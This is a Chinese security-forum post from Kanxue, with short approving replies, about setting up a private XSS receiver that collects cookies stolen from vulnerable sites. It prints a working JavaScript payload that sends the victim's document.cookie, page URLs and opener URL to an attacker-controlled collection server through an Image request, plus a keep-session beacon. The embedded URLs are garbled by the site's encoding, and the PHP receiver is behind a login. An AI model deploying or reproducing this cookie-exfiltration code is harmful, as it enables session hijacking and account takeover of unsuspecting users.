[原创]编写自己的XSS接受模块-WEB安全-看雪-安全社区|安全招聘|kanxue.com

[原创]编写自己的XSS接受模块

发表于: 2017-12-16 22:38 7002

[原创]编写自己的XSS接受模块

bywalks

2017-12-16 22:38

7002

看JS书籍中，看着看着就想到了XSS平台，不禁对XSS平台为什么可以接受cookie产生了思考？看了下接受cookie的代码，原来是接受的步骤是这样的。

我们在存在一个XSS漏洞的地方插入XSS代码，该XSS代码从远程载入一段Javascript。这段Javascript代码的作用就是向我们的XSS平台提交一段GET请求，这段GET请求包括浏览器的cookie（document.cookie），然后我们的XSS平台就接受GET请求，把cookie获取。

那么我们是否可以自己搭建个接受模块来接受cookie呢？毕竟用别人的平台别人是可以看到我们打到的cookie的。

这是XSS平台获取cookie的模块，下面的几段代码就可以让我们接受从某个地方打到的cookie

这段代码等同于<img src="http://localhost/xss.php?cookie=(document.cookie)….." />，也就是一个Img标签。该Img标签可以访问远程接受cookie的地址。

那么我们在自己的服务器上加一个xss1.js和接受并处理cookie的xss.php不就行了么。

这里的话我图简单就本地phpstudy搭建了，反正都一样。。。

接受和处理cookie的xss.php

(function () {
    (new Image()).src = '3e4K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4S2K6M7%4m8@1i4K6u0W2j5$3!0E0i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6V1L8#2)9K6c8r3q4H3K9g2)9J5y4X3q4E0M7q4)9K6b7X3W2V1i4K6y4p5i4K6N6n7M7s2u0G2K9X3g2U0N6p5W2V1i4K6N6p5i4K6t1$3j5h3#2H3i4K6y4n7L8r3!0U0j5i4c8A6L8$3&6Q4x3@1c8Q4x3U0N6Q4x3U0k6F1j5Y4y4H3i4K6y4n7i4K6u0n7i4K6t1$3L8X3u0K6M7q4)9K6b7X3g2K6j5$3q4H3k6g2)9J5z5q4)9J5z5r3k6#2L8X3y4@1K9h3!0F1i4K6t1$3L8X3u0K6M7q4)9K6b7W2)9J5z5q4)9J5z5g2)9J5y4X3&6T1M7%4m8Q4x3@1u0Q4y4@1t1`.
        try {
            return document.location.href
        } catch (e) {
            return ''
        }
    })()) + '&toplocation=' + escape((function () {
        try {
            return top.location.href
        } catch (e) {
            return ''
        }
    })()) + '&cookie=' + escape((function () {
        try {
            return document.cookie
        } catch (e) {
            return ''
        }
    })()) + '&opener=' + escape((function () {
        try {
            return (window.opener && window.opener.location.href) ? window.opener.location.href : ''
        } catch (e) {
            return ''
        }
    })());
})();
if ('{set.keepsession}' == 1) {
    keep = new Image();
    keep.src = '9fdK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4S2K6M7%4m8@1i4K6u0W2j5$3!0E0i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6V1L8#2)9K6c8r3E0W2k6i4m8K6k6i4y4K6K9h3!0F1i4K6t1$3j5h3#2H3i4K6y4n7K9h3c8Q4x3@1c8Q4y4@1u0H3M7X3!0B7k6h3y4@1d9h3c8Q4y4@1c8Q4x3U0k6S2L8i4m8Q4x3@1u0#2M7X3I4Q4x3@1c8Q4x3U0N6Q4x3U0k6F1j5Y4y4H3i4K6y4n7i4K6u0n7i4K6t1$3L8X3u0K6M7q4)9K6b7X3g2K6j5$3q4H3k6g2)9J5z5r3c8G2j5%4g2E0k6h3&6@1i4K6u0W2L8r3!0U0j5i4c8A6L8$3&6Q4x3U0W2Q4x3U0k6F1j5Y4y4H3i4K6y4n7i4K6u0n7i4K6t1$3L8X3u0K6M7q4)9K6b7W2)9J5y4#2)9J5y4X3q4E0M7q4)9K6b7X3y4G2L8$3E0A6k6g2)9K6c8q4)9J5y4#2)9J5y4X3&6T1M7%4m8Q4x3@1u0Q4x3V1u0Q4x3U0k6F1j5Y4y4H3i4K6y4n7k6i4y4U0j5i4m8W2i4K6t1^5k6r3!0U0N6h3#2W2L8Y4c8Q4x3X3g2U0L8$3!0C8K9h3g2Q4x3U0V1`.
};

登录后可查看完整内容

[培训]科锐逆向工程师培训第53期2025年7月8日开班！

收藏・5

免费・0

支持

最新回复 (4)
静河流雪币： 203 活跃值： (53) 能力值： ( LV5，RANK：60 ) 在线值：发帖 10 回帖 64 粉丝 4 关注私信	静河流 1 2 楼虽然基础，但很努力，优秀鼓励下，继续加油！ 2017-12-16 23:53 0
聖blue 雪币： 6818 活跃值： (153) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 358 粉丝 1 关注私信	聖blue 4 楼不错！ 2017-12-17 21:51 0
无涯gzs 雪币： 2 活跃值： (22) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 5 粉丝 1 关注私信	无涯gzs 5 楼现在的平台也很多的··谢谢· 2017-12-23 16:26 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

bywalks

发帖

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

专注于PC、移动、智能设备安全研究及逆向工程的开发者社区

最新回复 (4)
静河流雪币： 203 活跃值： (53) 能力值： ( LV5，RANK：60 ) 在线值：发帖 10 回帖 64 粉丝 4 关注私信	静河流 1 2 楼虽然基础，但很努力，优秀鼓励下，继续加油！ 2017-12-16 23:53 0
聖blue 雪币： 6818 活跃值： (153) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 358 粉丝 1 关注私信	聖blue 4 楼不错！ 2017-12-17 21:51 0
无涯gzs 雪币： 2 活跃值： (22) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 5 粉丝 1 关注私信	无涯gzs 5 楼现在的平台也很多的··谢谢· 2017-12-23 16:26 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复